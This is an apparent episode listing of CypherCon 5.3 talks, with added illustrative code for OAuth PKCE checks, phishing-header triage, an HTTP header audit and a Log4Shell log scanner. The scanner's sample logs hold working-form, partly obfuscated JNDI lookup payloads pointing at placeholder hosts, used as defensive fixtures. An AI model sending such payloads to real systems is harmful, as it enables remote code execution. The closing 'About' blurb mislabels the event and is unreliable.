Episodes (37)
Aug 01, 2022
Watch the opening ceremony with the CypherCon Team. Find out how the 2022 badges were made from the badge team. There are special guests and speakers you don't want to miss. Time to kick off CypherCon 5.3 in style.
Aug 12, 2022
Keeping up with regular compliance tasks can be draining and feel unrewarding, causing many to be overlooked or ignored. Ignoring these tasks can negatively affect our organizations and impact our job security. But if we don't ignore them, we risk falling behind on other obligations and getting burned out. Rather than ignore these tasks and risk burnout, we need to find the sources of compliance burdens and hack them. What makes a hacker is not a hoodie; it is finding ways to accomplish tasks using creative, effort-reducing methods. Hacking is not limited to the ...
Aug 19, 2022
Good security gets out of the way of users while getting in the way of adversaries. Passwords fail on both accounts. What holds us back from getting rid of passwords? Trust. In this session, we will propose a framework of technical controls to ensure only trusted sessions authenticate, regardless of faults or failures in any one factor. We will share a path forward for increasing trust in passwordless authentication.
Aug 19, 2022
Wi-Fi Bustin' makes me feel good. This talk will showcase the first-of-its-kind 'Pwnton Pack', a Ghostbusters-inspired take on wireless penetration testing. Featuring hardware hacking, microcontrollers and wireless attack arsenals bundled into a unique package; come learn why such a pack exists and fun details around the build experience. This talk is meant to inspire newcomers to InfoSec and Arduino devices, and to provide a fun take on existing methodologies and toolsets. For your Wi-Fi security needs: who you gonna call?
Sep 02, 2022
Sadly, climate change is progressing rapidly and is likely to be the greatest public health threat of this century according to the Lancet Commission on Climate Change and Health. Human emissions of greenhouse gas have already caused Earth's average temperature to rise by 1.8°F. This summer during the hottest June ever recorded, the hottest temperature ever recorded by scientific instruments occurred in Furnace Creek, Death Valley, California where the temperature was 130°F. During the same heat wave, Lytton, B.C., Canada recorded the hottest temperature ever in ...
Sep 09, 2022
We've reached a tipping point with more apps being delivered from cloud services than from on-premises. OAuth 2.0 and OpenID Connect (OIDC) have become essential in federating access and handling strong authentication. But these are frameworks, not standards, and these frameworks are based on dozens of RFCs. This has resulted in numerous approaches, confusing developers and security teams alike. In this presentation, participants will learn how to secure implementations.
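The controls that talk is pointing at are concrete: PKCE on the authorization code flow, a `state` value against login CSRF, a `nonce` bound to the ID token, and strict claim checks on the token that comes back. The block below is an added example written for this listing, not code from the presentation; the endpoint, client ID and redirect URI are placeholders, and it assumes the ID token's signature has already been verified against the provider's JWKS before `validate_id_token_claims` runs.

```python
"""PKCE, state/nonce and ID-token claim checks for an OAuth 2.0 / OIDC client.
Added illustration; not code from the talk. Endpoint and client values are placeholders."""
import base64
import hashlib
import secrets
import time
from urllib.parse import urlencode


def b64url(data: bytes) -> str:
    """Base64url without padding, as RFC 7636 and JOSE require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def make_pkce_pair():
    """Return (code_verifier, code_challenge) using the S256 method."""
    verifier = b64url(secrets.token_bytes(32))  # 43 chars, inside RFC 7636's 43..128 range
    return verifier, b64url(hashlib.sha256(verifier.encode("ascii")).digest())


def verify_pkce(verifier: str, stored_challenge: str, method: str = "S256") -> bool:
    """Token-endpoint side: reject 'plain', bad lengths and mismatches (constant-time compare)."""
    if method != "S256" or not 43 <= len(verifier) <= 128:
        return False
    expected = b64url(hashlib.sha256(verifier.encode("ascii")).digest())
    return secrets.compare_digest(expected, stored_challenge)


def build_authorize_url(auth_endpoint, client_id, redirect_uri, code_challenge, state, nonce):
    """Authorization request carrying PKCE, a CSRF 'state' and an ID-token 'nonce'."""
    params = {
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": "openid profile",
        "code_challenge": code_challenge,
        "code_challenge_method": "S256",
        "state": state,
        "nonce": nonce,
    }
    return f"{auth_endpoint}?{urlencode(params)}"


def validate_id_token_claims(claims, issuer, client_id, expected_nonce, now=None, leeway=60):
    """Return the names of failed checks on an ID-token payload whose signature was already verified."""
    now = time.time() if now is None else now
    problems = []
    if claims.get("iss") != issuer:
        problems.append("iss")
    aud = claims.get("aud")
    aud = aud if isinstance(aud, list) else [aud]
    if client_id not in aud:
        problems.append("aud")
    if len(aud) > 1 and claims.get("azp") != client_id:   # multi-audience tokens must name us in azp
        problems.append("azp")
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp < now - leeway:
        problems.append("exp")
    if claims.get("nonce") != expected_nonce:              # binds the token to this login attempt
        problems.append("nonce")
    return problems


if __name__ == "__main__":
    verifier, challenge = make_pkce_pair()
    state, nonce = secrets.token_urlsafe(16), secrets.token_urlsafe(16)
    print(build_authorize_url("https://idp.example/authorize", "my-client",
                              "https://app.example/cb", challenge, state, nonce))
    print("verifier accepted:", verify_pkce(verifier, challenge))
```

The client keeps `verifier`, `state` and `nonce` in its session, sends only the challenge and the two random values in the authorization request, and refuses the callback unless the returned `state` matches; the token endpoint, in turn, refuses the code unless `verify_pkce` passes.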
Sep 16, 2022
An in-depth panel with the creators of this year's unique CypherCon 5.3 electronic badge. They take questions from the audience, Discord and Twitter. Learn about the "behind the scenes" of hacker badge creation.
Sep 23, 2022
As a defender, I'm often asked "Is this message legitimate?" As attackers become more clever, determining the legitimacy of email messages can be a real challenge. This talk will examine e-mail headers and how to distinguish legitimate messages from those that could lead to fraud or identity theft.
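The header checks a defender actually runs on such a question are the SPF/DKIM/DMARC verdicts the receiving MX recorded, whether the signing and bounce domains line up with the visible From domain, and the hop chain in the Received headers. The block below is an added example for this listing, not tooling from the talk; the message it parses is constructed (the domains are reserved example names) and mimics a phish that passes SPF and DKIM for the sender's own infrastructure while failing DMARC for the spoofed From domain.

```python
"""Triage an e-mail's headers: authentication results, domain alignment and the Received chain.
Added illustration, not tooling from the talk. The message below is constructed, not a real capture."""
import email
import re
from email import policy
from email.utils import parseaddr

SAMPLE_MESSAGE = """\
Return-Path: <bounce@mail-campaign.example.net>
Received: from mail-campaign.example.net (mail-campaign.example.net [203.0.113.10])
 by mx.corp.example (Postfix) with ESMTPS id ABC123
 for <victim@corp.example>; Mon, 19 Sep 2022 10:15:02 -0500 (CDT)
Received: from localhost (unknown [10.0.0.5])
 by mail-campaign.example.net (Postfix) with ESMTP id DEF456;
 Mon, 19 Sep 2022 10:14:59 -0500 (CDT)
Authentication-Results: mx.corp.example;
 spf=pass smtp.mailfrom=mail-campaign.example.net;
 dkim=pass header.d=mail-campaign.example.net;
 dmarc=fail header.from=bank.example
From: "Your Bank" <alerts@bank.example>
To: victim@corp.example
Subject: Urgent: verify your account
Message-ID: <1234@mail-campaign.example.net>

(body omitted)
"""


def _domain(addr) -> str:
    return parseaddr(str(addr))[1].rpartition("@")[2].lower()


def _aligned(candidate: str, org: str) -> bool:
    """Relaxed DMARC alignment: same domain as From, or a subdomain of it."""
    return bool(candidate) and (candidate == org or candidate.endswith("." + org))


def auth_results(msg) -> dict:
    """{'spf': 'pass', 'dkim': 'pass', 'dmarc': 'fail'} from Authentication-Results headers."""
    found = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for mech, verdict in re.findall(r"\b(spf|dkim|dmarc|arc)=(\w+)", str(hdr), re.I):
            found.setdefault(mech.lower(), verdict.lower())   # the first (our MX's) verdict wins
    return found


def alignment(msg) -> dict:
    from_dom = _domain(msg.get("From", ""))
    rp_dom = _domain(msg.get("Return-Path", ""))
    dkim_doms = []
    for hdr in msg.get_all("Authentication-Results", []):
        dkim_doms += [d.lower() for d in re.findall(r"header\.d=([\w.-]+)", str(hdr))]
    return {"from_domain": from_dom, "return_path_domain": rp_dom, "dkim_domains": dkim_doms,
            "spf_aligned": _aligned(rp_dom, from_dom),
            "dkim_aligned": any(_aligned(d, from_dom) for d in dkim_doms)}


def received_chain(msg):
    """Hops oldest-first; every relay prepends its own Received line, so reverse the header order."""
    hops = []
    for hdr in msg.get_all("Received", []):
        m = re.search(r"from\s+(\S+).*?\bby\s+(\S+)", str(hdr), re.S)
        if m:
            hops.append((m.group(1), m.group(2)))
    return hops[::-1]


def triage(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)   # policy.default unfolds headers
    auth, align = auth_results(msg), alignment(msg)
    flags = []
    if auth.get("dmarc") != "pass":
        flags.append(f"DMARC {auth.get('dmarc', 'absent')} for {align['from_domain']}")
    if not align["spf_aligned"]:
        flags.append(f"Return-Path domain {align['return_path_domain']!r} is not the From domain")
    if not align["dkim_aligned"]:
        flags.append("no DKIM signature from the From domain")
    return {"auth": auth, "alignment": align, "hops": received_chain(msg), "flags": flags}


if __name__ == "__main__":
    result = triage(SAMPLE_MESSAGE)
    for hop in result["hops"]:
        print("hop:", hop[0], "->", hop[1])
    for flag in result["flags"]:
        print("flag:", flag)
```

The point the sample makes: "spf=pass" and "dkim=pass" alone say nothing about legitimacy, because they vouch for the campaign server's own domain. Only the alignment against the From domain (which is what DMARC evaluates) shows that nobody at bank.example signed or sent this message.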
Sep 30, 2022
Most organizations don't have enough budget to buy every tool nor hire every person they need. They also don't realize there are plenty of free tools, tactics and procedures available to the Blue Team. Here's a collection of tips and tricks learned from security professionals around the world about what you can do today to level up your People, Processes, and Technology - at little to no cost. You'll walk away with actionable tips to fill your security gaps and help reduce your attack surface.
Oct 07, 2022
This talk will explore the use of the Sonic Pi live coding environment as a means of using code to create music, as well as to provide an accessible gateway into more complex coding environments and applications.
Oct 14, 2022
Vehicle manufacturers are slowly limiting access to easy connection points in vehicles. I'll walk you through how we at CanBusHack bypass vehicle gateway controllers by physically connecting to easy-to-reach access points, and what information might be obtained at these points. I'll also give you some tools of the trade that won't damage your car (or, more importantly, your spouse's car).
Oct 21, 2022
Even though the Cold War ended almost 30 years ago, there are still a lot of valuable lessons that can be learned from that era. One of the hallmarks of Civil Defense was to prepare yourself and your family for the coming Nuclear War. There were thousands of pamphlets, ads and movies created to teach people how to survive and thrive when Mutually Assured Destruction came to fruition. In this presentation, I will go over some of the more famous Civil Defense campaigns of the Cold War and how you can apply these tips to keep yourself and your companies safe in the ...
Oct 28, 2022
By definition, hackers make things work in unexpected and unintended ways. To many outside this community, hacking seems like a destructive process. However, anyone that has ever created or utilized an exploit in an imaginative way knows that, at its heart, hacking is all about making something new. This talk, full of technical examples taken from opposing disciplines in information security, shows how healthy competition between makers and breakers drives progress.
Nov 04, 2022
While we worked from home during COVID, a massive international crypto project exploded in WI that allowed people to put up IoT and now cellular service from their homes and businesses. What started as practically nothing in 2020 now has over 250,000 of these hotspots deployed in public as of October 2021, carrying production traffic for large companies such as Lime for scooters, Salesforce, and even Victor mouse traps. As this project continues to grow using unlicensed spectrum such as CBRS on FCC certified equipment, I predict what we will see in the decade ...
Nov 11, 2022
This talk will explore the tools, risks, and rewards of automating the worst parts of your workday. This talk is for anybody who wants to reap low-hanging fruit in their tech stack and get some quick scripting wins.
Nov 18, 2022
The enemy of Digital Marketing is friction and IT Security creates lots of friction. Marketers are not just fighting their own IT Departments, they're fighting all of them. In this talk, Joe Cicero, Sr. Security Engineer, will discuss "Friction Red Flags" that Marketers unknowingly create and that he sees every day. If you are in IT Security and you deal with your Marketing department, this talk will help you develop a checklist to have more friction-less digital materials.
Nov 25, 2022
Ransomware is a financially motivated crime. The goal is to inhibit business systems in order to extract a payment. Historically, there's been plenty of financial gain from ransoming data as it resides in traditional on-prem systems. So the question is, will there be evolutionary pressure on attackers, forcing them to evolve their tactics? In this talk, Kat will be demoing strategies threat actors might employ to affect the availability of business data in the cloud.
Dec 02, 2022
HTTP headers are an often overlooked, though very powerful, way to improve the security of your application. We'll take a look at which headers can be used to find vulnerabilities in your site, look at some examples I've seen while scanning thousands of sites, and demo a live scan of a site.
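What a scan of that kind checks is not whether a header is present but whether its value actually does anything: an HSTS `max-age` of a few minutes, a CSP that whitelists `*` with `'unsafe-inline'`, an `X-Frame-Options` value browsers do not recognise, a session cookie without `Secure`/`HttpOnly`, and version strings in `Server` or `X-Powered-By`. The block below is an added example for this listing, not the speaker's scanner; the two response header sets are constructed, and the severities are this example's own rough grading rather than any published scoring.

```python
"""Audit an HTTP response's security headers against the mistakes a header scanner looks for.
Added illustration; not the scanner from the talk. The sample responses are constructed."""
import re
import urllib.request

SIX_MONTHS = 15_552_000  # HSTS max-age below this is commonly flagged as too short

# Constructed examples of a weak and a hardened response (not captured from real sites).
SAMPLE_WEAK = {
    "Server": "Apache/2.4.41 (Ubuntu)",
    "X-Powered-By": "PHP/7.4.3",
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=300",
    "X-Frame-Options": "ALLOWALL",
    "Content-Security-Policy": "default-src * 'unsafe-inline' 'unsafe-eval'",
    "Set-Cookie": "session=abc123; Path=/",
}
SAMPLE_STRONG = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload",
    "Content-Security-Policy": "default-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Permissions-Policy": "camera=(), microphone=(), geolocation=()",
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
}

DISCLOSURE_HEADERS = {"server": "Server", "x-powered-by": "X-Powered-By"}


def csp_directive(csp: str, name: str):
    """Lower-cased source list for one CSP directive, or None if the directive is absent."""
    for part in csp.split(";"):
        tokens = part.split()
        if tokens and tokens[0].lower() == name:
            return [t.lower() for t in tokens[1:]]
    return None


def audit_headers(headers: dict):
    """Return (severity, header, detail) findings for a dict of response headers."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append(("high", "Strict-Transport-Security", "missing; browsers will still try plain HTTP"))
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < SIX_MONTHS:
            findings.append(("medium", "Strict-Transport-Security", f"max-age too short: {hsts}"))

    csp = h.get("content-security-policy")
    framing_blocked = h.get("x-frame-options", "").upper() in ("DENY", "SAMEORIGIN")
    if csp is None:
        findings.append(("high", "Content-Security-Policy", "missing; no browser-side XSS mitigation"))
    else:
        script = csp_directive(csp, "script-src")
        if script is None:                         # script-src falls back to default-src
            script = csp_directive(csp, "default-src") or []
        risky = {"'unsafe-inline'", "'unsafe-eval'", "*", "data:"} & set(script)
        if risky:
            findings.append(("high", "Content-Security-Policy", f"script sources allow {sorted(risky)}"))
        framing_blocked = framing_blocked or csp_directive(csp, "frame-ancestors") is not None
    if not framing_blocked:
        findings.append(("medium", "X-Frame-Options", "no frame-ancestors/DENY/SAMEORIGIN; page can be framed (clickjacking)"))

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append(("medium", "X-Content-Type-Options", "missing 'nosniff'; MIME sniffing allowed"))
    if "referrer-policy" not in h:
        findings.append(("low", "Referrer-Policy", "missing; URLs may leak to third parties"))

    cookie = h.get("set-cookie")
    if cookie:
        attrs = {a.strip().split("=")[0].lower() for a in cookie.split(";")[1:]}
        missing = [a for a in ("secure", "httponly") if a not in attrs]
        if missing:
            findings.append(("medium", "Set-Cookie", f"cookie lacks {missing}"))

    for key, shown in DISCLOSURE_HEADERS.items():
        if key in h and re.search(r"\d+\.\d+", h[key]):
            findings.append(("info", shown, f"version disclosed: {h[key]}"))
    return findings


def fetch_and_audit(url: str):
    """Live check: GET the URL and audit its headers (duplicate Set-Cookie lines collapse to one here)."""
    req = urllib.request.Request(url, headers={"User-Agent": "header-audit/1.0"})
    with urllib.request.urlopen(req) as resp:
        return audit_headers(dict(resp.headers.items()))


if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_WEAK), ("strong", SAMPLE_STRONG)):
        print(label, "->", len(audit_headers(sample)), "findings")
        for sev, hdr, detail in audit_headers(sample):
            print(f"  [{sev}] {hdr}: {detail}")
```

`fetch_and_audit` is the live-scan counterpart; run it only against sites you are authorised to test. Note that `urllib` follows redirects, so the headers audited are those of the final response, which is usually what you want.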
Dec 09, 2022
The best incident response planning and preparation can be quickly derailed by an anxious executive seeking catharsis. Important characteristics of an effective incident response - such as discipline, organization, and foresight - all depend on an organization's ability to avoid panic. Once panic sets in, our attention must focus on protecting response procedures from thrashing and poor judgment. For security teams and scuba divers, it's not enough to know how to escape immediate danger. We must also learn to maintain workable risk levels by keeping others calm and ...
Dec 16, 2022
The single best way Humans transfer knowledge is through stories. We are a social species and there are no better stories than Star Trek episodes. Nearly every episode of Star Trek involves some sort of security incident. Everything from someone stealing data (or Data), insider threats, APT, malware, and more. There is a lot of content we can use as examples to help teach and learn.
Dec 23, 2022
We all have our favorite vendors and have those vendors we love to hate. Many places like trying to homogenize on a specific vendor or technology. What happens if you put all your eggs in one security vendor basket? Is it worth doing that? Does not knowing how a vendor's Machine Learning makes decisions hurt or help us? Let us travel down a real-world scenario as to why using multiple vendors and multiple threat feeds could be advantageous. Wait, is that Defense in Depth? Maybe it is, but not in a way you normally think of.
Dec 30, 2022
Security is often not funded because the cost of risk, as evaluated by an organization for its own benefit, has an ROI that is below other possible investments. However, there are multiple benefits to evaluating risk from an ethical perspective. This presentation proposes a maturity model for the ethics of risk, based on an evaluation of research related to ethical risk. The framework describes risk, management, legal, and engineering concerns appropriate to risk analysts, security staff, or software engineering professionals. The framework provides a list of actionable ...
Jan 06, 2023
You are savvy enough to have a virtual private network aka VPN. Maybe you did a bit of research and bought one that lets you be "anonymous" and lets you stream your favorite streaming service from anywhere while you travel. How well do you trust your VPN provider? Have you considered that your VPN provider could be doing things you didn't expect? Consumer VPNs, free VPNs, even VPNs that pay you. We will dig into what some VPN providers are doing. We analyzed hundreds of VPNs and their services to give you a deeper understanding of what actually is happening behind the...
Jan 13, 2023
We've all been there. You visit your favorite website only to be harassed by the virtual assistant. Being asked the same questions, in the same way...Over and Over. Never really getting the answers you need, or the direction required to move forward. This brings us to the power of AIML Driven Virtual Assistants. In this session I will introduce the concept of Conversational Driven Design and how to use open-source solutions to add "Intelligent" bots to your environment. We will review current options, security implications of AIML driven virtual assistants, and build ...
Jan 17, 2023
Numerous data governance laws and policies have been enacted to protect user privacy. Policies may define data retention (how long the data must be kept), data purging requirements (when the data must be destroyed), and data consent (whether the data can be used for a particular purpose). To comply with these requirements and to minimize liability, database systems (e.g., Oracle, Postgres) must offer built-in support to enforce storage and use policies. Instead, such compliance is currently achieved through a patchwork of manual solutions within each organization. In ...
Jan 20, 2023
There are dozens of great talks that will show you why you should get a job in a cool info-sec niche, with spectacular selling points. Every job has downsides and challenging days, though, especially for specific personalities and learning styles. This talk digs into nine cool info-sec roles, then suggests why you might enjoy or dislike working in them based on the elements that aren't camera worthy or talked about gleefully. There's a cyber security job out there for everyone, and it's important to find the one that makes you happy and successful.
Jan 24, 2023
Meditation is becoming a buzz-word for "beating" stress but seems very complicated to learn. We will show how DIY (Do It Yourself) brain technology projects such as DIY EEG (electroencephalogram) and tDCS (transcranial direct current stimulation) can actually work as training wheels for a relaxed and energized mind. Transcranial direct current stimulation (tDCS) is a non-invasive, painless brain stimulation treatment that uses direct electrical currents to stimulate specific parts of the brain. A constant, low intensity current is passed through two electrodes placed...
Jan 27, 2023
In the lead-up to the 2020 US Presidential election, there were a lot of concerns from security professionals about the potential role that Deepfake media could play in shaping voter opinions. While these concerns were not unfounded, in the end there were no notable instances of deep-fakes being used to manipulate the election. Why not? What is the current status of Deepfake technology? Where are we headed next? Hacker and Security evangelist Alyssa Miller will answer these questions and talk about how the threat landscape will continue to evolve as we head into the ...
Jan 31, 2023
Blue Team Security is the hardest job in Information Security. It is not sexy, and it is always complicated to navigate between the people, processes, and technology of the organization. Why do companies, .govs and NGOs have breaches? Thinking they are solving problems with technology. This talk will cover Tactics, Techniques and Procedures that blue teams can use, based on lessons learned from insurgent and counter-insurgent operations in history.
Feb 03, 2023
The last 50 years have witnessed the practical extinction of the natural nighttime environment from most of the inhabited places on our planet. The majority of people can no longer see the stars in the sky overhead at night from where they live. The reason? Light pollution; an incredible glut of wasted energy that we create, every second of every night, in levels that increase from year to year. The negative effects of light pollution (LP) reach far beyond that of having robbed us of our views of the universe. While awareness of this issue has grown, not much has been...
Feb 07, 2023
The NIST Cybersecurity Framework (CSF) from the National Institute of Standards and Technology gives organizations a documented set of outcomes, grouped into the five functions Identify, Protect, Detect, Respond and Recover, for managing and recovering from cybersecurity incidents. It is widely recognized as industry best practice and one of the most comprehensive, in-depth frameworks available. Let's discuss this framework.
Feb 10, 2023
Network defenders are accustomed to watching for malicious activity from the public internet as well as their own local network. What happens when an attack doesn't come from a typical avenue? This talk will dive into wireless attacks, defenses, and an unconventional multi-factor authentication bypass.
Feb 14, 2023
As your company winds down for the holiday season, like clockwork, another fresh CVE with publicly available exploit code drops. The Apache Log4j vulnerability CVE-2021-44228, dubbed Log4Shell, had widespread fallout once exploit code was made publicly available, and organizations are still dealing with the associated problems months later. This talk will discuss three distinct scenarios observed as a result of Log4j being exploited on VMware Horizon servers, including 1) exploitation for persistent access via a webshell, 2) exploitation leading to ...
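The scenarios in that talk start the same way: a request with a `${jndi:...}` lookup in a field the application logs, usually the User-Agent or a URL parameter, and almost always obfuscated with nested `${lower:...}`, `${upper:...}` or `${::-x}` default-value lookups so that a naive grep for `${jndi:` misses it. The block below is an added example for this listing, not tooling from the talk; it de-obfuscates the lookups the way Log4j 2's interpolator would before matching, and runs over constructed access-log lines (the addresses are documentation ranges, not real attackers).

```python
"""Flag Log4Shell (CVE-2021-44228) probes in web server logs, including obfuscated ones.
Added illustration; not tooling from the talk. Log lines below are constructed, not real captures."""
import re

# Constructed access-log lines in combined format; the last field is the User-Agent,
# a header that Log4j-backed applications commonly logged verbatim.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2021:03:12:44 +0000] "GET /portal/index.html HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Dec/2021:03:13:01 +0000] "GET /portal/index.html HTTP/1.1" 200 1432 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.9 - - [13/Dec/2021:03:13:07 +0000] "GET /broker/xml HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${lower:l}${lower:d}ap://198.51.100.9/x}"',
    '198.51.100.11 - - [13/Dec/2021:03:13:15 +0000] "GET / HTTP/1.1" 200 5 "-" "${${::-j}${env:NOPE:-n}di:rmi://198.51.100.11:1099/obj}"',
    '203.0.113.8 - - [13/Dec/2021:03:14:00 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

INNERMOST = re.compile(r"\$\{([^${}]*)\}")          # a ${...} with nothing nested inside it
JNDI_TARGET = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)://([^/}\s]+)", re.I)


def _resolve(inner: str):
    """Evaluate one lookup the way Log4j 2's interpolator would, or None if it stays opaque."""
    low = inner.lower()
    if low.startswith("lower:"):
        return inner[6:].lower()
    if low.startswith("upper:"):
        return inner[6:].upper()
    if ":-" in inner:                      # ${prefix:key:-default}: an unknown key yields the default
        return inner.split(":-", 1)[1]
    return None                            # e.g. ${jndi:...} itself, or a harmless ${version}


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            value = _resolve(m.group(1))
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def scan(lines):
    """One hit per line whose de-obfuscated form contains a ${jndi:<scheme>://<target>} lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI_TARGET.search(norm)
        if m:
            hits.append({"line": n, "client": line.split()[0],
                         "scheme": m.group(1).lower(), "target": m.group(2), "normalized": norm})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} -> {hit['scheme']}://{hit['target']}")
```

The `target` field is the callback host the attacker wants the server to reach; egress logs or DNS for that host are where to look next, because a probe only became one of the talk's three scenarios once the JNDI lookup actually connected out. The plain `${version}` in the last line shows why the check must be for a resolved `jndi:` lookup and not for `${` alone.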
Feb 17, 2023
Long before it became an infosec capture-the-flag staple, steganography had its birth in the Steganographia of Johannes Trithemius, an early 16th century book of magic and secret writing. Though it remains perhaps the most widely known, this is but one among countless examples of cryptography from the Renaissance and early modern eras used by alchemists, magicians, and dissidents to conceal their hidden knowledge from the prying eyes of the uninitiated. By applying the lens of cyber threat intelligence to the Steganographia and other examples of Renaissance and early ...
Feb 21, 2023
Daniel Creed has been an information security professional for more than 20 years, now working at a place shifting left at scale: 8 million servers, 200+ Tbps and growing. Throughout his career he has worked across numerous sectors of private, governmental, and educational industries, performed thousands of advanced penetration tests, built and led high-performance red/purple/blue teams, and worked in every functional discipline within the information security landscape. In addition to numerous industry certifications, Daniel has a B.S. Cybersecurity and Information ...
Feb 24, 2023
Virtual Reality (VR), Augmented Reality (AR) and Mixed Reality (MR) together are now referred to as XR, or Extended Reality. In 2022 there are already well over 10 million XR headsets in the hands of consumers and corporate users. From the Meta Quest 2 to the Microsoft HoloLens 2, XR is changing how we experience our own reality. But what can go wrong? What about privacy concerns? Is every one of our gestures being recorded? Have you ever gotten VR sick? How can we trick our brains in beneficial ways? Together we'll assess the following XR topics: ...
Feb 28, 2023
The FINAL presentation of CypherCon 5.3 is closing ceremony featuring Michael Goetzman and the CypherCon Team.
About
Hackers of CypherCon (also known as CypherCon 3.0) Season 3 (2022) was released on Aug 01, 2022, and the latest season, season 3, of Hackers of CypherCon was released in 2022. Watch Hackers of CypherCon online, the English documentary TV series from the United States. Hackers of CypherCon is directed by Jason Gares and created by Jason Gares with Michael Goetzman and Lesley Carhart.